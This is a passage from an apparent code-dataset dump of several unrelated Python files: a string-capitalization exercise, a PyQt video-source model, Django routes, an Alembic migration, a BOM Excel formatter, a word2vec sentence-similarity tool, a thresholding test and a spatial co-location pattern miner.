The function should capitalize\n the first letter of each word in the string then return the capitalized \n string \n\n --- examples\n capitalize('a short sentence') ---> 'A Short Sentence'\n capitalize('a lazy fox') ---> 'A Lazy Fox'\n capitalize('look, it is working!') ---> 'Look, It Is Working!'\n\n'''\n\n# Using the capitalize() function\ndef capitalize(text): \n return ' '.join([s.capitalize() for s in text.split()])\n\ndef capitalize_v2(text): \n words_list_cap = []\n for word in text.split(): \n words_list_cap.append(word[0].upper() + word[1:])\n \n return ' '.join(words_list_cap)\n\ndef capitalize_v3(text): \n result = text[0].upper()\n for idx in range(1, len(text)): \n if text[idx-1] == ' ': \n result += text[idx].upper()\n else: \n result += text[idx]\n\n return result\n\n\n# Testing \n\n# print(capitalize('a short sentence') )\n# print(capitalize('a lazy fox') )\n# print(capitalize('look, it is working!') )\n\n# print(capitalize_v2('a short sentence') )\n# print(capitalize_v2('a lazy fox') )\n# print(capitalize_v2('look, it is working!') )\n\nprint(capitalize_v3('a short sentence') )\nprint(capitalize_v3('a lazy fox') )\nprint(capitalize_v3('look, it is working!') )\n","repo_name":"knromaric/Algorithms-and-Data-Structure-in-python","sub_path":"capitalize/capitalize.py","file_name":"capitalize.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"27524470990","text":"# Standard library imports\nimport logging\n\n# Third party imports\nfrom PyQt5.QtCore import QAbstractTableModel, Qt, QVariant, pyqtSignal\n\n# Local application imports\nfrom database import videodb\nfrom database.models import VideoSource\n\nlogger = logging.getLogger(__name__)\n\n\nclass VideoSourceQtModel(QAbstractTableModel):\n db = videodb.FacebookVideoDatabase(dbname=r'facebookvideo.db')\n\n videoSourceAddedSignal = pyqtSignal(object)\n\n def __init__(self, parent, *args):\n QAbstractTableModel.__init__(self, parent, *args)\n # 5. fetch data\n\n results = self.db.session.query(VideoSource).all()\n self.mylist = results\n\n self.header = ['id', 'url']\n\n self.videoSourceAddedSignal.connect(self.add_source)\n\n def _update_model_data(self):\n self.beginResetModel()\n results = self.db.session.query(VideoSource).all()\n\n self.mylist = results\n self.endResetModel()\n\n def rowCount(self, parent):\n return len(self.mylist)\n\n def columnCount(self, parent):\n return len(self.header)\n\n def data(self, index, role):\n # 5. 
populate data\n if not index.isValid():\n return None\n if (role == Qt.DisplayRole):\n return getattr(self.mylist[index.row()],self.header[index.column()])\n else:\n return QVariant()\n\n def headerData(self, col, orientation, role):\n if orientation == Qt.Horizontal and role == Qt.DisplayRole:\n return self.header[col]\n return None\n\n def get_url(self, index: int):\n if index < len(self.mylist):\n return self.mylist[index].url\n else:\n return \"\"\n\n def add_source(self, url: str):\n if not self.check_page_exists(url):\n video_source = VideoSource(url = url)\n self.db.session.add(video_source)\n self.db.session.commit()\n self._update_model_data()\n\n def check_page_exists(self, url: str):\n url_existed = self.db.session.query(VideoSource).filter(VideoSource.url == url).first() is not None\n return url_existed","repo_name":"mtl0612/SocialVideoGrab","sub_path":"src/models/VideoSourceQtModel.py","file_name":"VideoSourceQtModel.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"10237159096","text":"from django.urls import path\r\nfrom .views import PostApiView, PostDetailApiView, LikeApiView, PostDeleteApiView\r\n\r\n\r\nurlpatterns = [\r\n path('posts', PostApiView.as_view(), name='post_api'),\r\n path('posts/', PostDetailApiView.as_view(), name='postdetail_api'),\r\n path('posts/:delete', PostDeleteApiView.as_view(), name='postdelete_api'),\r\n path('likes', LikeApiView.as_view(), name='likes_api')\r\n]","repo_name":"ogokdas/social-network_restful-api","sub_path":"Django_restful_API/posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"74055468928","text":"\"\"\"update tags\n\nRevision ID: a66bd73f59d3\nRevises: 5861dcba496d\nCreate Date: 2023-05-05 14:26:20.154977\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'a66bd73f59d3'\ndown_revision = '5861dcba496d'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('artickle_tag',\n sa.Column('article.id', sa.Integer(), nullable=False),\n sa.Column('tag_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['article.id'], ['article.id'], ),\n sa.ForeignKeyConstraint(['tag_id'], ['tag.id'], )\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('artickle_tag')\n # ### end Alembic commands ###\n","repo_name":"GAS53/flask_dz","sub_path":"project/migrations/versions/a66bd73f59d3_update_tags.py","file_name":"a66bd73f59d3_update_tags.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"27179268674","text":"# BOM formating \r\n# Original BOM 9010242321 now 123240109\r\nimport openpyxl\r\nimport re # Regular Expressions library\r\nfrom openpyxl.styles import PatternFill, Border, Side, Alignment, Protection, Font\r\n\r\nheaders = [\"Level\", \"Customer Part Number\", \"Qty\", \"Ref Des\", \"Item Rev\", \"Mara #\", \"Mara Description\", \"Cust MFR\", \"Cust MPN\", \"Cust Notes\", \"Higher Level\", \"Ext Qty\"]\r\n\r\n# Styling for headers\r\nfont_headers = Font(name = 'Arial', size = 10, bold = True)\r\n\r\n# Column map from CustBOM\r\ncust_bom_ref = {\"Level\": 1, \"Number\": 2, \"BOM.Qty\": 15, \"BOM.Ref\": 18, \"Rev\": 11, \"Description\": 4, \"Manufacturers.MFR Name\": 26, \"Manufacturers.MPN\": 27}\r\n\r\ndef main():\r\n\r\n filepath_old = \"a_20180412_064608761.xlsx\"\r\n filepath_new = \"a_20181029_024744353.xlsx\"\r\n\r\n wb_old = openpyxl.load_workbook(filepath_old)\r\n wb_new = openpyxl.load_workbook(filepath_new)\r\n\r\n cust_sheet = wb_old[\"Sheet0\"] # Select Sheet0 as CustBOM\r\n ws_new_sheet = wb_new[\"Sheet0\"] # Select Sheet0 of new file as CustBOM\r\n\r\n mara_format = wb_old.create_sheet(\"PFormat\") # Create new sheet called PFormat in old workbook\r\n \r\n # Print old wb sheet names\r\n print(wb_old.sheetnames)\r\n\r\n # Old sheet max rows and columns\r\n max_row = cust_sheet.max_row\r\n max_col = cust_sheet.max_column\r\n\r\n # New sheet max rows and columns\r\n max_new_row = ws_new_sheet.max_row\r\n max_new_col = ws_new_sheet.max_column\r\n\r\n # Prints stats of each file\r\n print(\"There are \" + str(max_row) + \" line items in \" + str(filepath_old))\r\n print(\"There are \" + str(max_new_row) + \" line items in \" + str(filepath_new))\r\n\r\n # Copies BOM lvl and Assy p/n to top\r\n for col in range(1,3):\r\n mara_format.cell(1, col).value = cust_sheet.cell(2, col).value\r\n \r\n # Copies Rev and Description to new format\r\n mara_format[\"E1\"] = cust_sheet[\"K2\"].value\r\n mara_format[\"G1\"] = cust_sheet[\"D2\"].value\r\n\r\n # Adding headers into new sheet\r\n col = 1\r\n for item in headers:\r\n mara_format.cell(2, col).value = item # Copies each header into each cell\r\n mara_format.cell(2, col).font = font_headers # Setting the styling of each header\r\n col += 1\r\n\r\n # Copying various customer columns (ref cust_bom_col variable at top) over to Mara new sheet\r\n m_col = 1 # Start col 1 of new sheet\r\n for cust_col in cust_bom_ref.values(): # Loop through each item in cust_bom_ref dict and use it's values\r\n m_row = 3 # Start row 3 of new sheet and reset to 3 after each column is copied \r\n for cust_row in range(3, max_row): # Loop through each row in cust sheet until end \r\n mara_format.cell(m_row, m_col).value = cust_sheet.cell(cust_row, cust_col).value # Copy cells from cust sheet cell to mara format cell\r\n m_row += 1 # Increase to new row of new sheet\r\n m_col += 1 # Increase to next col of new sheet\r\n if m_col == 6 or m_col == 11: # Skip col 6 and 11 of new sheet\r\n m_col += 1 \r\n\r\n # Adjust columns to length of cell values\r\n for col in mara_format.columns:\r\n max_length = 0\r\n column = col[0].column # Gets the Column letter/name\r\n for cell in col:\r\n try: 
# Avoid error on an empty cell\r\n if len(str(cell.value)) > max_length:\r\n max_length = len(cell.value)\r\n except:\r\n pass\r\n adjusted_width = (max_length + 1)\r\n mara_format.column_dimensions[column].width = adjusted_width\r\n\r\n # Insert Higher Level\r\n level_ref = {} # Dict to hold level number ref part number\r\n col = 1 # BOM level typically on column 1\r\n for row in range(2, max_row): # Loop through each row of CustBOM\r\n try: # Avoid error on an empty cell\r\n current_level = int(cust_sheet.cell(row, col).value) # Store the BOM level an int in variable current_level\r\n #if current_level == 0 or current_level == 1:\r\n level_ref[current_level] = cust_sheet.cell(row, col + 1).value # Store in dict \"current_level : part number\"\r\n except: # Just pass through if any error\r\n pass\r\n \r\n higher_lvl_col = 11 # Mara formatted sheet column \"Higher Level\"\r\n col = 1 # BOM level typically on column 1\r\n for row in range(3, max_new_row):\r\n try: \r\n bom_level = int(mara_format.cell(row, col).value)\r\n if bom_level >= 1: # If the Line item BOM level is >= 1\r\n mara_format.cell(row, higher_lvl_col).value = level_ref[bom_level - 1] # Ref level_ref dict for one BOM level higher\r\n except:\r\n pass \r\n\r\n def check_qty(qty, ref_des):\r\n '''\r\n Input: qty, ref_des (str) \\n\r\n Output: qty, num_ref_des, boolean qty == num_ref_des\r\n '''\r\n qty = int(qty)\r\n ref_des_split = ref_des.split(\",\")\r\n num_ref_des = len(ref_des_split)\r\n\r\n return (qty, num_ref_des, qty == num_ref_des)\r\n \r\n # Saves changes\r\n wb_old.save(filepath_old)\r\n\r\ndef remove_ws(phrase):\r\n '''Returns all whitespaces removed in phrase'''\r\n \r\n return phrase.replace(\" \", \"\")\r\n\r\ndef regex_ranges(string, pattern = '([A-Z]+)([0-9]+)-[A-Z]+([0-9]+)'):\r\n \"\"\"\r\n Takes in a string and regex pattern. Returns list of tuples with designators and start/end range.\r\n Default regex pattern: '([A-Z]+)([0-9]+)-[A-Z]+([0-9]+)'\r\n Return: [('R','2','5'),('CR','10','12')]\r\n \"\"\"\r\n # Default pattern: Regex formula to pull first Designator plus numerical range with \"-\"\" in the middle.\r\n return re.findall(pattern, string)\r\n\r\ndef sorted_nicely(l):\r\n \"\"\" Sorts the given iterable in the way that is expected.\r\n \r\n Required arguments:\r\n l -- The iterable to be sorted.\r\n \r\n \"\"\"\r\n convert = lambda text: int(text) if text.isdigit() else text\r\n alphanum_key = lambda key: [convert(c) for c in re.split('([0-9]+)', key)]\r\n return sorted(l, key = alphanum_key)\r\n\r\ndef unpack_des(phrase):\r\n \"\"\"\r\n Takes in \"phrase\" in str form, unpacks designators and returns it unpacked in string form.\r\n Phrase should contain a \"-\". ie. 
\"R20, R1-R5, R9, CR1-CR4, CR8, R10-R15, CR9-CR11, MAR3-MAR5, MAR1\"\r\n \"\"\"\r\n \r\n # Variables\r\n breakdown_phrase = [] # List to hold the phrase broken down into a list\r\n designators = '' # Variable to hold a string of unpacked and sorted designators\r\n unpacked_list = [] # Initiate variable to hold all unpacked designator char + number\r\n\r\n clean_phrase = remove_ws(phrase) # Removes all whitespace from phrase\r\n \r\n breakdown_phrase = clean_phrase.replace('-',',').split(',') # Takes phrase, replace '-' w/ ',' then split using ',' Need this for union of two lists later.\r\n \r\n extracted_tuples = regex_ranges(clean_phrase) # Uses regex pattern to pull all ranges from phrase\r\n\r\n # Loops through each set of tuples of extracted designators and ranges\r\n for range_set in extracted_tuples: \r\n # Grabs start[1] and end[2] + 1 ranges from each tuple set, concatenates designator char with number and appends to list\r\n # Unpacked_list adds to itself or else each loop iteration of a tuple set will erase the variable\r\n unpacked_list += [range_set[0] + str(des_num) for des_num in range(int(range_set[1]), int(range_set[2]) + 1)]\r\n \r\n repacked_list = list(set(unpacked_list).union(set(breakdown_phrase))) # Takes unpacked_list and combines with single designators list\r\n\r\n sorted_repacked_list = sorted_nicely(repacked_list) # Sorts list alphanumerically using \"sorted_nicely\" function\r\n\r\n for items in sorted_repacked_list: # Turns list back into a string with commas in between each designator\r\n designators += items + ','\r\n \r\n #print(designators.strip(\",\")) # Strips last \",\" at the end of string\r\n return designators.strip(\",\") # Strips last \",\" at the end of string and returns string\r\n\r\nif __name__ == '__main__':\r\n #main()\r\n\r\n new_des = unpack_des(\"R20, R1-R5, R9, CR1-CR4, CR8, R10-R15, CR9-CR11, MAR3-MAR5, MAR1\")\r\n print(new_des)","repo_name":"swiftvic/BOM_Format","sub_path":"BOM_Format.py","file_name":"BOM_Format.py","file_ext":"py","file_size_in_byte":10070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"4320974930","text":"#/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n# 测试完善中\r\n\r\nimport numpy\r\nimport jieba\r\njieba.set_dictionary(\"./data/jieba/dict.txt.big\")\r\njieba.load_userdict(\"./data/jieba/userdict.txt\")\r\nimport jieba.posseg\r\nimport jieba.analyse\r\nfrom gensim.models.word2vec import Word2Vec\r\nmodel = Word2Vec.load_word2vec_format(\"./data/vectors.bin\", binary=True)\r\nfrom mytools import time_me, get_current_time\r\n\r\ndef word_similarity(w1, w2):\r\n return model.similarity(w1, w2)\r\n\t\r\ndef sum_cosine(matrix, threshold):\r\n \"\"\"\r\n 1.计算语义Jaccard中分子total,即分词相似性矩阵的Cosine和\r\n 2.计算m: 两个集合中没有达到语义匹配标准(由阈值threshold控制)的总片段个数或者两者中取最大值\r\n \"\"\"\r\n total = 0\r\n count = 0\r\n row = matrix.shape[0]\r\n col = matrix.shape[1]\r\n zero_row = numpy.zeros([1,col])\r\n zero_col = numpy.zeros([row,1])\r\n max = matrix.max()\r\n while max > threshold:\r\n total += max\r\n count += 1\r\n re = numpy.where(matrix==max)\r\n i = re[0][0]\r\n j = re[1][0]\t\t\r\n matrix[i,:] = zero_row\r\n matrix[:,j] = zero_col\r\n max = matrix.max()\r\n m = (row - count) if row > col else (col - count)\r\n return dict(total=total, m=m, total_dif=max)\r\n\t\r\n@time_me()\t\r\ndef vec_jaccard(sentence1, sentence2, pattern = 'w'):\r\n \"\"\"\r\n 向量语义Jaccard, 返回向量语义相似度打分\r\n \"\"\"\r\n sv_matrix = []\r\n sv_rows = []\r\n if pattern == 'w':\r\n sv1 = 
list(jieba.cut(sentence1))\r\n sv2 = list(jieba.cut(sentence2))\r\n elif pattern == 't':\r\n sv1 = jieba.analyse.extract_tags(sentence1, topK=10)\r\n sv2 = jieba.analyse.extract_tags(sentence2, topK=10)\r\n print(sv1, sv2)\r\n\t# 根据训练好的vectors.bin建模来计算相似度。阈值设定为0.6,每两个词的相似度打分为[0,1]\r\n for w1 in sv1:\r\n for w2 in sv2:\r\n score = word_similarity(w1, w2)\r\n sv_rows.append(score)\r\n sv_matrix.append(sv_rows)\r\n sv_rows = []\t\r\n matrix = numpy.mat(sv_matrix)\t\r\n result = sum_cosine(matrix, 0.6)\r\n total = result[\"total\"]\r\n total_dif = result[\"total_dif\"]\r\n m = result[\"m\"]\r\n similarity = total/(total + m*(1-total_dif))\r\n\t\r\n return similarity\r\n\t\r\nif __name__ == '__main__':\r\n print(\"向量语义相似度测试......\") \r\n filename = \"log/VecSimilarity_\" + get_current_time() + \".md\"\r\n f = open(filename, \"w\")\r\n f.write(\"标签:测试文档\\n#向量语义相似度测试:\\n>Enter the VecSimilarity mode...\\n\")\r\n\r\n while True:\r\n try:\r\n sentence1 = input(\"\\nsentence1\\n>>\")\r\n sentence2 = input(\"sentence2\\n>>\")\r\n similarity = vec_jaccard(sentence1, sentence2, 'w')\r\n print(\"similarity: \" + str(similarity))\r\n similarity = vec_jaccard(sentence1, sentence2, 't')\r\n print(\"similarity: \" + str(similarity))\r\n \r\n f.write(\"`>>\" + sentence1 + \"`\\n\")\r\n f.write(\"`>>\" + sentence2 + \"`\\n\")\r\n f.write(\"`\" + \"similarity: \" + str(similarity) + \"`\\n\")\r\n except KeyboardInterrupt:\r\n f.close() ","repo_name":"timedcy/ImEverywhere","sub_path":"ImEverywhere/vec.py","file_name":"vec.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"9934100998","text":"from grn_thresholding import *\nimport numpy as np\nimport pandas as pd\nimport unittest\n\nclass soft_thresholding_tests(unittest.TestCase):\n def test_input(self):\n model = SoftThr(beta = .5)\n with self.assertRaises(ValueError):\n model(pd.DataFrame(np.random.rand(4, 3)))\n\n def test(self):\n G = np.asarray([[1, 2, 8], [4, 3, 9], [11, 30, 5]])\n G_thr = G ** .5\n model = SoftThr(beta = .5)\n assert (model(G) == G_thr).all()","repo_name":"soelmicheletti/grn-thresholding","sub_path":"tests/test_soft_thresholding.py","file_name":"test_soft_thresholding.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"18744728031","text":"#!/usr/local/bin/python3\n\n\"\"\"Script to find co-location patterns.\"\"\"\n\nimport math\nimport numpy as np\nimport pandas as pd\nimport pickle\nimport sys\n\nfrom tabulate import tabulate\nfrom time import time\n\nmainDF = None\nfeatureMap = {}\ncandidateFeatures = []\ntableInstances = []\ntotal_num_instances = {}\ncount_tables = {}\ncolocationRules = []\ncoLocations = []\ndistThreshold = None\ncolocationMap = {}\n\ncurrLat = None\ncurrLong = None\n\ntableList = []\n\ndistancePickle = None\n\n\nclass Table(object):\n \"\"\"Datastructure to save colocation.\"\"\"\n\n def __init__(self, colocationName, record):\n \"\"\"Constructor.\"\"\"\n self.prevalence = True\n self.name = colocationName\n # self.id = Table.newId()\n self.record = record # DataFrame\n self.participation_idx = 1\n count_tables[colocationName] = len(record.index)\n\n def set_participation_idx(self, participation_idx, prevalence_threshold):\n \"\"\"Set the participation Index.\"\"\"\n self.participation_idx = participation_idx\n if participation_idx < prevalence_threshold:\n self.prevalence = False\n\n def __str__(self):\n 
\"\"\"Represent the object in string.\"\"\"\n        return 'Name :{}, Record: {}'.format(self.name,\n                                             tabulate(self.record,\n                                                      headers='keys',\n                                                      tablefmt='psql'))\n\n    __repr__ = __str__\n\n\ndef readParams(configFile):\n    \"\"\"Read commandline parameters and parse the config file.\"\"\"\n    with open(configFile, 'r') as configFileHandle:\n        print('Reading config file :{}'.format(configFile), end=', ')\n        featuresFile = configFileHandle.read().strip()\n        print('Done')\n    return featuresFile\n\n\ndef mapFeatures(featuresList):\n    \"\"\"Map file names to Alphabet for short dictionary keys.\"\"\"\n    global featureMap\n    global mainDF\n\n    print('\\nFeature --> Shortname')\n    for num, feature in enumerate(featuresList):\n        alphabet = chr(65 + num)\n        featureMap[feature] = alphabet\n        cnt = len(mainDF[mainDF['feature'] == feature].index)\n        print('{} --> {}: {}'.format(feature, alphabet, cnt))\n    print('\\n')\n\n\ndef loadmainDF(featuresFile):\n    \"\"\"Generate the features map.\"\"\"\n    global mainDF\n    global featureMap\n\n    # Add column name\n    columns = ['rowId', 'lat', 'long', 'feature']\n    mainDF = pd.read_csv(featuresFile, names=columns)\n    featuresList = sorted(list(set(mainDF['feature'])))\n\n    # Map features\n    mapFeatures(featuresList)\n\n    # Map feature to Alphabet for all the records\n    mainDF['feature'] = mainDF['feature'].apply(\n        lambda x: featureMap[x])\n\n    print('Total {} records'.format(len(mainDF.index)))\n\n\n# def haversineDistance(origin, destination):\ndef haversineDistance(destination):\n    \"\"\"Calculate the Haversine distance between two geo co-ordinates.\"\"\"\n    global currLat\n    global currLong\n    lat1, lon1 = currLat, currLong\n    lat2, lon2 = map(float, destination)\n    radius = 3959 # miles\n    dlat = math.radians(lat2 - lat1)\n    dlon = math.radians(lon2 - lon1)\n\n    a = math.sin(dlat / 2) * math.sin(dlat / 2) + math.cos(math.radians(lat1)) * \\\n        math.cos(math.radians(lat2)) * math.sin(dlon / 2) * math.sin(dlon / 2)\n\n    c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n    d = radius * c\n\n    if d < distThreshold:\n        return True\n    else:\n        return False\n\n\ndef createColocationMap(featuresMap):\n    \"\"\"Generate the pairwise colocation tables.\"\"\"\n    global currLat\n    global currLong\n    global colocationMap\n\n    colocationMap[2] = []\n\n    features = [_ for _ in featureMap.values()]\n    featureCount = len(features)\n\n    for idx1 in range(featureCount):\n        currFeature = features[idx1]\n\n        # Current feature records\n        cR = mainDF[mainDF['feature'] == currFeature]\n\n        for idx2 in range(idx1 + 1, featureCount):\n            # Other feature records\n            otherFeature = features[idx2]\n            print('Generating colocation table for {}{}'.format(currFeature,\n                                                                otherFeature))\n            oR = mainDF[mainDF['feature'] == otherFeature]\n            copyOR = oR\n            tempRowInsts = []\n\n            start = time()\n            processed = 0\n            recCount = len(cR.index)\n\n            for _, row in cR.iterrows():\n                currLat, currLong = row['lat'], row['long']\n                index = row['rowId']\n\n                latUp = row['lat'] + 0.00725\n                latLow = row['lat'] - 0.00725\n                longUp = row['long'] + 0.00725\n                longLow = row['long'] - 0.00725\n\n                oR = oR[(oR['lat'] < latUp)]\n                oR = oR[(oR['lat'] > latLow)]\n                oR = oR[(oR['long'] > longLow)]\n                oR = oR[(oR['long'] < longUp)]\n\n                if len(oR.index) == 0:\n                    processed += 1\n                    if processed % 500 == 0 or processed == recCount:\n                        end = time() - start\n                        print('{} {} {}'.format(processed, end,\n                                                recCount - processed))\n                        start = time()\n                    continue\n\n                destinationCoords = oR[['lat', 'long']].values.tolist()\n                results = []\n                for coords in destinationCoords:\n                    results.append(haversineDistance(coords))\n\n                for idx, res in 
enumerate(results):\n if res:\n tempRowInsts.append(\n [index, oR.iloc[idx]['rowId']])\n oR = copyOR\n\n processed += 1\n if processed % 500 == 0 or processed == recCount:\n end = time() - start\n print('{} {} {}'.format(processed, end,\n recCount - processed))\n start = time()\n\n colocationTable = Table(currFeature + otherFeature,\n pd.DataFrame(tempRowInsts,\n columns=[currFeature,\n otherFeature]))\n colocationMap[2].append(colocationTable)\n\n\ndef longest_common_substring(string1, string2):\n \"\"\"Find the common columns between two colocation table.\"\"\"\n m = len(string1)\n n = len(string2)\n\n L = [[0 for x in range(n+1)] for x in range(m+1)]\n\n # Following steps build L[m+1][n+1] in bottom up fashion. Note\n # that L[i][j] contains length of LCS of X[0..i-1] and Y[0..j-1]\n for i in range(m+1):\n for j in range(n+1):\n if i == 0 or j == 0:\n L[i][j] = 0\n elif string1[i-1] == string2[j-1]:\n L[i][j] = L[i-1][j-1] + 1\n else:\n L[i][j] = max(L[i-1][j], L[i][j-1])\n\n # Following code is used to print LCS\n index = L[m][n]\n\n # Create a character array to store the lcs string\n lcs = [\"\"] * (index+1)\n lcs[index] = \"\"\n\n # Start from the right-most-bottom-most corner and\n # one by one store characters in lcs[]\n i = m\n j = n\n while i > 0 and j > 0:\n\n # If current character in X[] and Y are same, then\n # current character is part of LCS\n if string1[i-1] == string2[j-1]:\n lcs[index-1] = string1[i-1]\n i -= 1\n j -= 1\n index -= 1\n\n # If not same, then find the larger of two and\n # go in the direction of larger value\n elif L[i-1][j] > L[i][j-1]:\n i -= 1\n else:\n j -= 1\n\n return \"\".join(lcs)\n\n\ndef subsequences(string, n):\n \"\"\"Compute the subsequnces.\"\"\"\n return [string[i:i+n] for i in range(len(string)-n+1)]\n\n\ndef isValidCandidate(tableA, tableB, size):\n \"\"\"Check if by merging two colocation tables we can create new.\"\"\"\n name = tableA.name + tableB.name\n coLocationName = ''.join(set(name))\n return size == len(coLocationName)\n\n\ndef joinTables(tableA, tableB):\n \"\"\"Join tables and their common records.\"\"\"\n name = tableA.name + tableB.name\n coLocationName = ''.join(sorted(set(name)))\n print('Joining {} and {} : New Colocation:{}'.format(tableA.name,\n tableB.name,\n coLocationName))\n commonFeatures = longest_common_substring(tableA.name, tableB.name)\n if len(commonFeatures) > 1:\n commonFeatures = list(commonFeatures)\n print(commonFeatures)\n records = pd.merge(tableA.record, tableB.record, how='inner',\n on=commonFeatures)\n\n table = type('Table', (object,), {})()\n found_index = -1\n if len(tableInstances[len(coLocationName)-1]) > 0:\n for i in range(len(tableInstances[len(coLocationName)-1])):\n if tableInstances[len(coLocationName)-1][i].name == coLocationName:\n found_index = i\n break\n\n print('Found Index{}'.format(found_index))\n if found_index > -1:\n table = tableInstances[len(coLocationName)-1][i]\n table.record.append(records, ignore_index=True)\n else:\n table = Table(coLocationName, records)\n\n return found_index, table\n\n\ndef createCandidates(size):\n \"\"\"Run through the pruned tables and create candidates.\"\"\"\n prunedTables = []\n for instance in tableInstances[size-1]:\n if instance.prevalence:\n prunedTables.append(instance)\n tableInstances.append([])\n for i in range(0, len(prunedTables)-1):\n for j in range(i+1, len(prunedTables)):\n if isValidCandidate(prunedTables[i], prunedTables[j], size + 1):\n found_index, joinT = joinTables(prunedTables[i],\n prunedTables[j])\n if found_index == -1:\n 
tableInstances[size].append(joinT)\n\n\ndef calculatePrevalence(size, prevalence_threshold):\n \"\"\"Calculate Prevalence.\"\"\"\n for i in range(0, len(tableInstances[size-1])):\n features = tableInstances[size-1][i].record.columns.values.tolist()\n number_of_instances = [len(np.unique(tableInstances[size-1][i].record[f].values)) for f in features]\n participation_ratios = [float(number_of_instances[index])/total_num_instances[f] for index, f in enumerate(features)]\n if tableInstances[size-1][i].name == 'IM':\n print(number_of_instances)\n print(total_num_instances)\n participation_idx = min(participation_ratios)\n tableInstances[size-1][i].set_participation_idx(participation_idx, prevalence_threshold)\n count_tables[tableInstances[size-1][i].name] = len(tableInstances[size-1][i].record.index)\n print('Table Name {} : Participation Index -> {}'.format(tableInstances[size-1][i].name, participation_idx))\n\n\ndef initializeColocation(prevalence_threshold):\n \"\"\"Initialize Colocation.\"\"\"\n global featureMap\n global colocationMap\n global distancePickle\n\n initial_tables_1 = []\n for feature in featureMap:\n rowIds = mainDF['rowId'][mainDF['feature'] ==\n featureMap[feature]].values\n total_num_instances[featureMap[feature]] = len(rowIds)\n records = pd.DataFrame(data=rowIds, columns=[feature])\n table = Table(featureMap[feature], records)\n initial_tables_1.append(table)\n\n tableInstances.append(initial_tables_1)\n with open(distancePickle, 'rb') as f:\n initial_tables_2 = pickle.load(f)\n\n tableInstances.append(initial_tables_2)\n calculatePrevalence(2, prevalence_threshold)\n # For colocation of size 2\n generateColocationRules(1)\n\n\ndef generateColocationRules(size):\n \"\"\"Generate the co-location rules.\"\"\"\n global colocationRules\n global coLocations\n for i in range(0, len(tableInstances[size])):\n if tableInstances[size][i].prevalence:\n substrings = []\n for j in range(len(tableInstances[size][i].name)):\n s = subsequences(tableInstances[size][i].name, j)\n substrings.append(s)\n flat_substrings_list = [item for sublist in substrings for item in sublist]\n flat_substrings_list = list(filter(None, flat_substrings_list))\n for sub_str in flat_substrings_list:\n if sub_str not in count_tables or count_tables[sub_str] == 0:\n continue\n rule_name = sub_str + '->' + tableInstances[size][i].name.replace(sub_str, \"\")\n conditional_probability = (float)(len(tableInstances[size][i].record[list(sub_str)].drop_duplicates().index)) / count_tables[sub_str]\n if conditional_probability > 1:\n continue\n rule = {}\n rule[rule_name] = round(conditional_probability, 3)\n colocationRules.append(rule)\n\n coLocations.append(tableInstances[size][i].name)\n\n\ndef colocationMinerAlgo(prevalence_threshold):\n \"\"\"Run the Colocation Miner Algorithm.\"\"\"\n initializeColocation(prevalence_threshold)\n previousColocation = True\n for k in range(3, len(featureMap)):\n if previousColocation:\n createCandidates(k-1)\n calculatePrevalence(k, prevalence_threshold)\n # print(tableInstances[k-1])\n generateColocationRules(k-1)\n else:\n break\n\n\ndef createQGISFiles():\n \"\"\"Generate Files for QGIS.\"\"\"\n for i in range(2, len(tableInstances)):\n for table in tableInstances[i]:\n rows = []\n if table.prevalence:\n features = list(table.name)\n for index, row in table.record.iterrows():\n if index % 30 != 0:\n continue\n if index > 1000:\n break\n for f in features:\n curRow = []\n curRow.append(mainDF['lat'][mainDF['rowId'] == row[f]]\n .values[0])\n 
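As a reading aid for `calculatePrevalence` above: a minimal, self-contained sketch of the participation-index computation on a toy co-location table. The frame, per-feature totals, and threshold here are invented for illustration, not taken from the dataset.

import pandas as pd

# Hypothetical co-location table for pattern "AB": each row pairs an
# instance of feature A with a nearby instance of feature B.
table = pd.DataFrame({'A': [1, 1, 2], 'B': [7, 8, 7]})
total_num_instances = {'A': 4, 'B': 5}  # assumed per-feature totals

# Participation ratio = distinct participating instances / total instances.
ratios = {f: table[f].nunique() / total_num_instances[f] for f in table.columns}
# Participation index of the pattern = minimum ratio over its features.
participation_idx = min(ratios.values())

prevalence_threshold = 0.4  # assumed threshold
print(ratios)                                     # {'A': 0.5, 'B': 0.4}
print(participation_idx >= prevalence_threshold)  # True -> pattern is prevalent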
curRow.append(mainDF['long'][mainDF['rowId'] == row[f]]\n .values[0])\n curRow.append(index+1)\n rows.append(curRow)\n\n df = pd.DataFrame(rows, columns=['Lat', 'Long', 'group'])\n df.to_csv('../data/output/' + table.name + '.csv')\n\n\ndef main():\n \"\"\"Initialize everything and run the algorithm.\"\"\"\n global distThreshold\n global colocationMap\n global distancePickle\n\n mainStart = time()\n\n if len(sys.argv) < 2:\n print('Please pass the parameters ')\n sys.exit(-1)\n configFile = sys.argv[1]\n\n # Value that determines the neighbor relation\n distThreshold = 0.45\n # Value that determines the prevalence index\n prevIndexThres = 0.80\n # Other configurations\n usePickle = True\n qgisFiles = True\n # Pickle file name\n distancePickle = '../data/pickle/dist45.pickle'\n\n print('######### CONFIGURATION #########')\n print('Distance Threshold: {}'.format(distThreshold))\n print('Prevalence Index: {}'.format(prevIndexThres))\n print('#################################')\n\n featuresFile = readParams(configFile)\n loadmainDF(featuresFile)\n\n if not 